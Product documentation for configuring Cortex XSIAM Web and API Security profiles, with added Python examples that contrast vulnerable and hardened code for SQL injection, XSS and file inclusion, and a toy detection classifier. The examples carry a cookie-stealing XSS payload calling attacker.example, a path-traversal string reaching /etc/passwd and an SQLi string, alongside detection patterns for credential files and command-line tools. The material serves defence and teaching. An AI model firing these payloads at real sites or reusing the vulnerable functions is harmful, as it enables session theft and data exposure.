Web and API Security profiles provide comprehensive real-time detection and protection for web-based applications and APIs running on Linux-based workloads.
Note
Web and API Security profiles and policies are currently a Beta feature.
Web and API Security profiles are applied through policies to the Linux-based workloads that you want to protect.
For each setting that you want to override, clear the corresponding option to Use Default, and then select the setting of your choice.
Note
In this profile, a Block option configures the workload to block the offending request. A Report option configures the workload to report the corresponding detection to Cortex XSIAM without blocking the request. A Disable option configures the workload to neither analyze nor report the corresponding attack type.
Add a new profile and define basic settings.
From Cortex XSIAM, select → → → → . Click +Add Profile, and select whether to create a new profile, or to import a profile from a file.
Select the Linux platform, and Web & API Security as the profile type.
Click Next.
Enter a unique Profile Name for the profile. The name can contain only letters, numbers, or spaces, and must be no more than 30 characters. The name will be visible from the list of profiles when you configure a policy rule.
(Optional) Enter a description of the intention or business purpose of the profile.
Configure Action Mode options. If you choose Enable, you can then configure each item separately.
Item
Options
More details
Action Mode
Enable
Disable
When set to Enable, Cortex XSIAM performs the action configured for each of the items below. When set to Disable, the items below cannot be configured individually and their protections are not applied.
XSS
Block
Report
Disable
When Cortex XSIAM detects a cross-site scripting (XSS) attempt, it performs the configured action.
In an XSS attack, malicious JavaScript is injected into an otherwise benign and trusted website, typically through user input that the site reflects or stores without escaping. The payload tricks the browser into switching from an HTML context to a JavaScript context, so the attacker's script runs in the victim's browser with the site's privileges.
SQL Injection
Block
Report
Disable
When Cortex XSIAM detects SQL injection (SQLi) attempts, it performs the configured action.
SQLi attacks occur when an attacker inserts SQL syntax into input that a web application includes in a database query without proper parameterization. A successful attack can read sensitive data from the database, modify data in the database, or, depending on the database and the privileges it runs with, run arbitrary commands.
Injection Attacks
Block
Report
Disable
When Cortex XSIAM detects injection attacks, it performs the configured action.
Injection attacks are attacks in which an attacker supplies crafted input that the application passes to an interpreter, so that it is executed as commands or code rather than treated as data. Command and code payloads can be carried in HTTP requests, or included from local or remote files (also known as File Inclusion attacks).
CVE Exploits
Block
Report
Disable
When Cortex XSIAM detects an attempt to exploit a known vulnerability (one published as a Common Vulnerabilities and Exposures (CVE) entry), it performs the configured action.
Sensitive Data Exposure
Block
Report
Disable
When Cortex XSIAM detects a response that would expose sensitive data, it performs the configured action.
This module inspects responses for content from critical system files, including password hashes (/etc/shadow), user account information (/etc/passwd), and private keys, and applies the configured action before the workload returns such content.
Authentication Bypass
Block
Report
Disable
When Cortex XSIAM detects attempts to bypass authentication controls, it performs the configured action.
This module protects against attacks that attempt to circumvent authentication controls through session manipulation, token exploitation, or credential abuse.
Advanced Threat Protection
Block
Report
Disable
When Cortex XSIAM detects evolving threats, it performs the configured action.
Advanced Threat Protection (ATP) detects, prevents, and responds to sophisticated web and API threats, including techniques that change over time, so that workloads stay protected as attacks evolve.
Offensive Tools
Block
Report
Disable
Cortex XSIAM can identify offensive tools that scan web applications for known security vulnerabilities and misconfigurations, or attempt to exploit them. When such a tool is detected, it performs the configured action.
Malformed Traffic
Block
Report
Disable
When Cortex XSIAM detects HTTP requests with anomalies that are not expected from common web browsers, it performs the configured action.
Automation Tools
Block
Report
Disable
When Cortex XSIAM detects automated tools, it performs the configured action.
Automated tools such as scriptable headless web browsers, command-line tools, and HTTP libraries can be used to scrape website content or otherwise drive the application without a human user.
Known Bots
Block
Report
Disable
When Cortex XSIAM detects known bots, it performs the configured action.
Cortex XSIAM can identify legitimate bots that properly declare their identity and purpose, such as search engine crawlers and authorized web indexers. These bots follow standard protocols and provide verifiable operator information. However, some of them might cause undesirable behavior, such as spam, and you might prefer to block them.
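The XSS, SQL Injection, and Injection Attacks rows above describe the attack classes the profile acts on. The following Python script, added here as an illustration and not part of Cortex XSIAM or its documentation, shows what those attacks look like at the application layer: a query built by string concatenation against a constructed in-memory SQLite table, a template that reflects input unescaped, and a file include that trusts a relative path, each beside its hardened form. The table contents, the payload strings, and the base directory /srv/app/templates are assumptions made for the example.

```python
import html
import os
import sqlite3


def make_db():
    # Constructed in-memory user table standing in for an application's
    # database (sample data for this example only).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT, pw_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "admin", "hash-a"), ("bob", "user", "hash-b")],
    )
    return conn


def lookup_vulnerable(conn, name):
    # Vulnerable: caller-controlled text is concatenated into the statement,
    # so quotes and keywords in the input change what the query means.
    sql = "SELECT name, role FROM users WHERE name = '" + name + "' ORDER BY name"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, name):
    # Hardened: the value is bound as a parameter and never parsed as SQL,
    # so the same payload simply matches no row.
    sql = "SELECT name, role FROM users WHERE name = ? ORDER BY name"
    return conn.execute(sql, (name,)).fetchall()


def render_vulnerable(display_name):
    # Vulnerable (reflected XSS): input is placed into HTML as-is, so a
    # <script> tag switches the browser into a JavaScript context.
    return "<p>Welcome, " + display_name + "</p>"


def render_hardened(display_name):
    # Hardened: escaping makes the browser treat the input as text only.
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


def include_vulnerable(base_dir, requested):
    # Vulnerable (local file inclusion): a relative path is joined without
    # checking that it stays under base_dir, so "../" segments escape it.
    return os.path.normpath(os.path.join(base_dir, requested))


def include_hardened(base_dir, requested):
    # Hardened: resolve the path and refuse anything outside base_dir.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


# Constructed attacker inputs for the demonstration (assumptions).
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
LFI_PAYLOAD = "../../../etc/passwd"
BASE_DIR = "/srv/app/templates"  # assumed template directory


def demo():
    conn = make_db()
    return {
        "sqli_vulnerable": lookup_vulnerable(conn, SQLI_PAYLOAD),  # every row
        "sqli_hardened": lookup_hardened(conn, SQLI_PAYLOAD),      # no rows
        "xss_vulnerable": render_vulnerable(XSS_PAYLOAD),          # live <script>
        "xss_hardened": render_hardened(XSS_PAYLOAD),              # &lt;script&gt;
        "lfi_vulnerable": include_vulnerable(BASE_DIR, LFI_PAYLOAD),  # /etc/passwd
        "lfi_hardened": include_hardened(BASE_DIR, LFI_PAYLOAD),      # None
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

The vulnerable halves are the requests the XSS, SQL Injection, and Injection Attacks items are meant to catch on the wire; the hardened halves are the application-side fixes that should exist regardless of whether the profile is set to Block or Report.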
To save the profile, click Create.
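To make the Block / Report / Disable semantics concrete across the Sensitive Data Exposure, Malformed Traffic, Automation Tools, and Known Bots rows, here is a simplified Python classifier written for this page; it is not Cortex XSIAM code, and the product's detection logic is far more extensive than these few signatures. The PROFILE dictionary, the User-Agent and file-content patterns, and the sample request/response records are constructed for the example and do not represent the product's configuration format or rules.

```python
import re

# Hypothetical profile for this example: one Block / Report / Disable choice
# per item, using the item names from the table. The dict is this
# example's own shape, not a Cortex XSIAM configuration format.
PROFILE = {
    "Sensitive Data Exposure": "Block",
    "Malformed Traffic": "Report",
    "Automation Tools": "Report",
    "Known Bots": "Disable",
}

# Constructed signatures, just enough to show each category.
AUTOMATION_UA = re.compile(r"curl|wget|python-requests|HeadlessChrome|Go-http-client", re.I)
KNOWN_BOT_UA = re.compile(r"Googlebot|bingbot", re.I)
SENSITIVE_CONTENT = [
    re.compile(r"^root:x:0:0:", re.M),                             # /etc/passwd
    re.compile(r"^[a-z_][a-z0-9_-]*:\$[0-9a-z]+\$", re.M | re.I),  # /etc/shadow hash
    re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),  # private key
]


def classify(rec, enabled):
    """Return the enabled items that one request/response record triggers.

    Items whose action is Disable are not in `enabled`, so they are not
    analyzed at all, matching the note on the Disable option.
    """
    hits = []
    headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    ua = headers.get("user-agent", "")
    # Browsers always send Host and User-Agent over HTTP/1.1 or HTTP/2;
    # anything else is an anomaly a common browser would not produce.
    if "Malformed Traffic" in enabled and (
        "host" not in headers or not ua or rec.get("version") not in ("HTTP/1.1", "HTTP/2")
    ):
        hits.append("Malformed Traffic")
    if "Known Bots" in enabled and KNOWN_BOT_UA.search(ua):
        hits.append("Known Bots")
    elif "Automation Tools" in enabled and AUTOMATION_UA.search(ua):
        hits.append("Automation Tools")
    if "Sensitive Data Exposure" in enabled and any(
        p.search(rec.get("response_body", "")) for p in SENSITIVE_CONTENT
    ):
        hits.append("Sensitive Data Exposure")
    return hits


def apply_profile(rec, profile=PROFILE):
    """Return (decision, reported): "block" or "allow", plus the items reported."""
    enabled = {item for item, action in profile.items() if action != "Disable"}
    reported = classify(rec, enabled)  # Report and Block both reach the console
    blocked = any(profile[item] == "Block" for item in reported)
    return ("block" if blocked else "allow", reported)


# Constructed request/response records (not captured traffic).
SAMPLES = {
    "browser": {
        "version": "HTTP/1.1",
        "headers": {"Host": "shop.example", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/120.0"},
        "response_body": "<html>ok</html>",
    },
    "curl_leak": {
        "version": "HTTP/1.1",
        "headers": {"Host": "shop.example", "User-Agent": "curl/8.5.0"},
        "response_body": "root:x:0:0:root:/root:/bin/bash\n",
    },
    "no_host": {
        "version": "HTTP/1.0",
        "headers": {"User-Agent": "Mozilla/5.0"},
        "response_body": "",
    },
    "googlebot": {
        "version": "HTTP/1.1",
        "headers": {"Host": "shop.example", "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"},
        "response_body": "<html>ok</html>",
    },
}


def run_samples(profile=PROFILE):
    return {name: apply_profile(rec, profile) for name, rec in SAMPLES.items()}


if __name__ == "__main__":
    for name, (decision, reported) in run_samples().items():
        print(f"{name:10s} {decision:5s} {reported}")
```

With this profile the curl request that leaks /etc/passwd is blocked and reported under two items, the Host-less HTTP/1.0 request is reported but allowed, and the Googlebot request is allowed silently because Known Bots is set to Disable; flipping that item to Block changes the decision for that record alone. Treat the User-Agent checks as illustrative only: the "verifiable operator information" the Known Bots row refers to means operator-published verification such as reverse-DNS checks, which a string match does not perform.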